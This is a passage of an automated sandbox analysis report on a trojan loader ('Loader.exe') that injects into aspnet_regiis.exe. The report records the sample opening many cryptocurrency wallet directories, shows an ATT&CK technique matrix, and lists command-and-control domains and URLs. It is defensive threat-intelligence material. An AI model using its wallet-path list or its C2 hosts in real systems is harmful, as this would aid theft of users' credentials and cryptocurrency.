              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUFJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: Yara matchFile source: 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7388, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7388, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Disable or Modify Tools
              LSASS Memory231
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
              Virtualization/Sandbox Evasion
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection
              NTDS131
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information
              LSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials33
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Loader.exe55%ReversingLabsWin32.Trojan.Generic
              Loader.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\msvcp110.dll100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\msvcp110.dll63%ReversingLabsWin32.Trojan.Tedy
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              withdrwblon.cyou
              188.114.96.3
              truetrue
                unknown
                171.39.242.20.in-addr.arpa
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  mediavelk.sbstrue
                    unknown
                    definitib.sbstrue
                      unknown
                      strikebripm.sbstrue
                        unknown
                        elaboretib.sbstrue
                          unknown
                          https://withdrwblon.cyou/apitrue
                            unknown
                            activedomest.sbstrue
                              unknown
                              ostracizez.sbstrue
                                unknown
                                withdrwblon.cyoutrue
                                  unknown
                                  offybirhtdi.sbstrue
                                    unknown
                                    arenbootk.sbstrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://withdrwblon.cyou/waspnet_regiis.exe, 00000008.00000003.1373056224.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1391970997.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373694057.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://withdrwblon.cyou/Coaspnet_regiis.exe, 00000008.00000003.1373852192.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://withdrwblon.cyou/apixiaspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://withdrwblon.cyou/apieaspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://withdrwblon.cyou/apihaspnet_regiis.exe, 00000008.00000003.1392151745.00000000036AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://withdrwblon.cyou/api(waspnet_regiis.exe, 00000008.00000003.1393784209.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423519992.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1425008855.00000000036BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://withdrwblon.cyou/aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423075609.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373823973.0000000005950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://x1.c.lencr.org/0aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://x1.i.lencr.org/0aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://withdrwblon.cyou/x_aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://withdrwblon.cyou/apiedaspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://withdrwblon.cyou:443/apiaspnet_regiis.exe, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://withdrwblon.cyou/apiqpvaspnet_regiis.exe, 00000008.00000003.1348748371.0000000005958000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                188.114.96.3
                                                                withdrwblon.cyouEuropean Union
                                                                13335CLOUDFLARENETUStrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1541479
                                                                Start date and time:2024-10-24 21:50:08 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 52s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:15
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Loader.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@4/2@2/1
                                                                EGA Information:
                                                                • Successful, ratio: 50%
                                                                HCA Information:
                                                                • Successful, ratio: 94%
                                                                • Number of executed functions: 8
                                                                • Number of non-executed functions: 76
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target aspnet_regiis.exe, PID 7388 because there are no executed function
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: Loader.exe
                                                                TimeTypeDescription
                                                                15:51:06API Interceptor7x Sleep call for process: aspnet_regiis.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                188.114.96.3rPedidodecompra__PO20441__ARIMComponentes.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                • dddotx.shop/Mine/PWS/fre.php
                                                                Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                • paste.ee/d/nwtkd
                                                                Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                • www.launchdreamidea.xyz/bd77/
                                                                PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                • www.timizoasisey.shop/3p0l/
                                                                BL.exeGet hashmaliciousFormBookBrowse
                                                                • www.launchdreamidea.xyz/bd77/
                                                                w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                9XHFe6y4Dj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 733812cm.n9shteam.in/DefaultWordpress.php
                                                                SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                • servicetelemetryserver.shop/api/index.php
                                                                t1zTzS9a3r.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
                                                                aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                • main.dsn.ovh/dns/lovely
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUShttps://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.16.123.96
                                                                https://t.ly/8LgfkGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 104.17.25.14
                                                                phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                https://view.flodesk.com/emails/671a6d1f7ce9f793bb70518aGet hashmaliciousUnknownBrowse
                                                                • 104.18.18.100
                                                                http://boulos-sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                • 188.114.96.3
                                                                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 8.40.143.15
                                                                https://u47751895.ct.sendgrid.net/ls/click?upn=u001.LUpianUM71xe7PV7wDA6i1kcuy38W249FfPzE-2Fn4iGArrL0MQBCUZHFEzmfBrwW7hf5h8aNQUml0OSIHqpXf0Hd-2FwQBg2gsGxKHK7PsY2xc-3DPya1_YT5LbHmSQ6soq50ixwpFbSYZshuq6-2FPFgRa8NDnR03IYhL-2F9Rsp4maHC7HKUeszLncLvtZaWCVsMwsguQ5-2FbgriKbvHymTrFFrqjql1V0tvMkZQvyA1xxy-2B6NtGFoUeUGIrvdabsXN8enx2k5c-2BvLXzm-2BRXmD29Cf33DbXC513Cwkuo46G2I7a1uwsANH8eVhz8r5XyLPneRi4ngixWtQkBEaLBBKkl5CzEPySNlMnqJuuWiTBlFswgUf9EX-2BEhUpqAvMFuAlKTpYcteS-2FjAegbPmUSDcSeBkfnhL6yUhTFHUFrxra-2BdIgnamsXKUUqu-2BC45G51EOfBd9qOCqWy3OeOC7KYj3-2FcaIfcOAM1Jkvyddtn3gwRC5w97RLza-2BBM2JcZLNzMYva4SJzBZv7RClCaMcjevyjP6ZFvlR0NECf5zAmWbPLmCUnefze8ZyTvnDqXVb3nrflSdnTlNxWfm617xjOrSoSu-2BVHZVqbE92ZodSyvWqgaCWZg0TMDZeq64M67nuH9ryo7I5u80SS081vnMThCYiPoN3JUoUliQPKbNY46GxAPyVhMs4qqZVi-2FFUtIGEycXziXytxfy6JCzAZ2sa7DZusc1RftLAVM4uJit-2FAhxM-2FK1sEHsKHKvs9o7uDMExZ5YqEBjrD2XHch-2BY6xwRGGg56MeC1Bpa72xAoR6DmInmiEX4j92yaROEh1-2FMsHdtSstN7zc8gxU7ETVWVMBRLf6m4dTRruSfSNaLUi9QLq9d7Qfe8VMdKN1j9FMGIYia88728BDNNxRTaT4nSNITRr9JPa4Z1K1vdUocdyCKNcYSZsN8yguI0-2FqNXUfWFuoxnz5MDqwufLzxub8Fw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                http://lowes.mooo.com/index.php?search=4&d16852&morde=354-1256&lm=400100KWWT29761&sd=15&page=9u6rpKHD2TMFWFa#izRRKlsmoFgLg4jmhaU9Get hashmaliciousPhisherBrowse
                                                                • 188.114.96.3
                                                                https://chapelet-mariae.com.pl/qgxPm/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                https://tronlkam8s2.z13.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                                                                • 188.114.96.3
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                SecuriteInfo.com.Heur.11787.148.exeGet hashmaliciousLummaCBrowse
